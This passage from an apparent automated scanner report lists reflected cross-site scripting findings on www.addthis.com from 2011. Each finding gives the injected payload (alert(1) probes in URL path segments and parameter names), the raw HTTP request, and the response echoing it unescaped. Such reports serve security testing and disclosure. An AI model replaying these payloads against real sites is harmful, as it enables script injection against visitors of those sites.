This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer/borderTopLeft.pngad936"-alert(1)-"040809406b5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:01 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=2mahq7q4f2hrmjmetg8k76da31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1414

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer/borderTopLeft.pngad936"-alert(1)-"040809406b5";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.113. http://www.addthis.com/images4/internet_explorer/borderTopLeft.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopLeft.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5e2ed<script>alert(1)</script>d32a9419509 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderTopLeft.png?5e2ed<script>alert(1)</script>d32a9419509=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:48 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=alo57gkca19j2fe98kc9pd4eo0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1402

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderTopLeft.png?5e2ed<script>alert(1)</script>d32a9419509=1</strong>
...[SNIP]...

2.114. http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopRight.png

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab24d"-alert(1)-"3cf5fed8d16 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4ab24d"-alert(1)-"3cf5fed8d16/internet_explorer/borderTopRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=5oki5p5i5nmu3fhichdjmnedb5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4ab24d"-alert(1)-"3cf5fed8d16/internet_explorer/borderTopRight.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar
...[SNIP]...

2.115. http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopRight.png

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8dbdb<script>alert(1)</script>219f890e3b6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images48dbdb<script>alert(1)</script>219f890e3b6/internet_explorer/borderTopRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:44 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=lqecvos3fssnatige2bhkc4gk3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images48dbdb<script>alert(1)</script>219f890e3b6/internet_explorer/borderTopRight.png</strong>
...[SNIP]...

2.116. http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopRight.png

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 54258<script>alert(1)</script>03b8b03df5b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer54258<script>alert(1)</script>03b8b03df5b/borderTopRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=6frch4hatemiqavvvu4ehoidr4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer54258<script>alert(1)</script>03b8b03df5b/borderTopRight.png</strong>
...[SNIP]...

2.117. http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopRight.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 43e70"-alert(1)-"92d5fce7c0e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer43e70"-alert(1)-"92d5fce7c0e/borderTopRight.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:49 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=cfcgn29kj0tgtg79caqvki1u54; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer43e70"-alert(1)-"92d5fce7c0e/borderTopRight.png";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False"
...[SNIP]...

2.118. http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopRight.png

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c92be<script>alert(1)</script>832cc49e182 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderTopRight.pngc92be<script>alert(1)</script>832cc49e182 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=sig82v0ho9k72if5fhr2qb0o51; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1442

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderTopRight.pngc92be<script>alert(1)</script>832cc49e182</strong>
...[SNIP]...

2.119. http://www.addthis.com/images4/internet_explorer/borderTopRight.png [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopRight.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20411"-alert(1)-"be2406c9a19 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /images4/internet_explorer/borderTopRight.png20411"-alert(1)-"be2406c9a19 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=nlekle1e1nm5l6leipv2q190h5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1416

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/images4/internet_explorer/borderTopRight.png20411"-alert(1)-"be2406c9a19";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPageTrac
...[SNIP]...

2.120. http://www.addthis.com/images4/internet_explorer/borderTopRight.png [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/images4/internet_explorer/borderTopRight.png

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload c6c76<script>alert(1)</script>040082d3fe0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /images4/internet_explorer/borderTopRight.png?c6c76<script>alert(1)</script>040082d3fe0=1 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.addthis.com

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:53:36 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=laitlceru2dcl3r6rq2esceb66; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1404

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>images4/internet_explorer/borderTopRight.png?c6c76<script>alert(1)</script>040082d3fe0=1</strong>
...[SNIP]...

2.121. http://www.addthis.com/services/trends-load/format/json [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/services/trends-load/format/json

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9fde9"-alert(1)-"44bdb324baf18bc96 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /services9fde9"-alert(1)-"44bdb324baf18bc96/trends-load/format/json?cat=&cnt=10&sort=share HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
Cache-Control: no-cache
Host: www.addthis.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=tgvqvcjtm20dsah8t836enh395; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services9fde9"-alert(1)-"44bdb324baf18bc96/trends-load/format/json";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","F
...[SNIP]...

2.122. http://www.addthis.com/services/trends-load/format/json [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/services/trends-load/format/json

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload b68cb<script>alert(1)</script>02626ab95d683fd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /servicesb68cb<script>alert(1)</script>02626ab95d683fd2/trends-load/format/json?cat=&cnt=10&sort=share HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
Cache-Control: no-cache
Host: www.addthis.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:50 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=9ht0qsshrnconl0qdgk0k2lps6; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1451

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>servicesb68cb<script>alert(1)</script>02626ab95d683fd2/trends-load/format/json?cat=&cnt=10&sort=share</strong>
...[SNIP]...

2.123. http://www.addthis.com/services/trends-load/format/json [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/services/trends-load/format/json

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c57d2<script>alert(1)</script>1457cdcfe71954c1f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /services/trends-loadc57d2<script>alert(1)</script>1457cdcfe71954c1f/format/json?cat=&cnt=10&sort=share HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
Cache-Control: no-cache
Host: www.addthis.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=0kcgk2f9l4sd5ao7uudibvr213; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1453

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>services/trends-loadc57d2<script>alert(1)</script>1457cdcfe71954c1f/format/json?cat=&cnt=10&sort=share</strong>
...[SNIP]...

2.124. http://www.addthis.com/services/trends-load/format/json [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/services/trends-load/format/json

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 94857"-alert(1)-"f0fc964aea1593faf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /services/trends-load94857"-alert(1)-"f0fc964aea1593faf/format/json?cat=&cnt=10&sort=share HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
Cache-Control: no-cache
Host: www.addthis.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 23 Apr 2011 03:54:53 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=bbndalmj2n9uf3vdf9celoaka0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1427

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/services/trends-load94857"-alert(1)-"f0fc964aea1593faf/format/json";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);

...[SNIP]...

2.125. http://www.addthis.com/services/trends-load/format/json [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/services/trends-load/format/json

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d05ee"><script>alert(1)</script>072058e8192df35c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /services/trends-load/formatd05ee"><script>alert(1)</script>072058e8192df35c7/json?cat=&cnt=10&sort=share HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
Cache-Control: no-cache
Host: www.addthis.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 23 Apr 2011 03:54:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=12fkhgpt0srd64g94om4hhqep1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error</title>
<link
...[SNIP]...
<a href="/services/trends-load/formatd05ee"><script>alert(1)</script>072058e8192df35c7/json">
...[SNIP]...

2.126. http://www.addthis.com/services/trends-load/format/json [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/services/trends-load/format/json

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4b27b"-alert(1)-"8fb6350b63558a22f was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Request

GET /services/trends-load/format4b27b"-alert(1)-"8fb6350b63558a22f/json?cat=&cnt=10&sort=share HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Netsparker)
X-Requested-With: XMLHttpRequest
Accept: application/json, text/javascript, */*
Cache-Control: no-cache
Host: www.addthis.com
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 500 Internal Server Error
Date: Sat, 23 Apr 2011 03:54:57 GMT
Server: Apache
X-Powered-By: PHP/5.2.16
Set-Cookie: PHPSESSID=312u9p8htq2giaearhsijdm5h0; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
Content-Length: 1182

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error</title>
<link
...[SNIP]...
<script type="text/javascript">
var u = "/services/trends-load/format4b27b"-alert(1)-"8fb6350b63558a22f/json";
if (window._gat) {
var gaPageTracker = _gat._getTracker("UA-1170033-1");
gaPageTracker._setDomainName("www.addthis.com");
gaPageTracker._setCustomVar(1,"Login","False",2);
gaPag
...[SNIP]...

2.127. http://www.addthis.com/services/trends-load/format/json [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.addthis.com
Path:	/services/trends-load/format/json

Issue detail

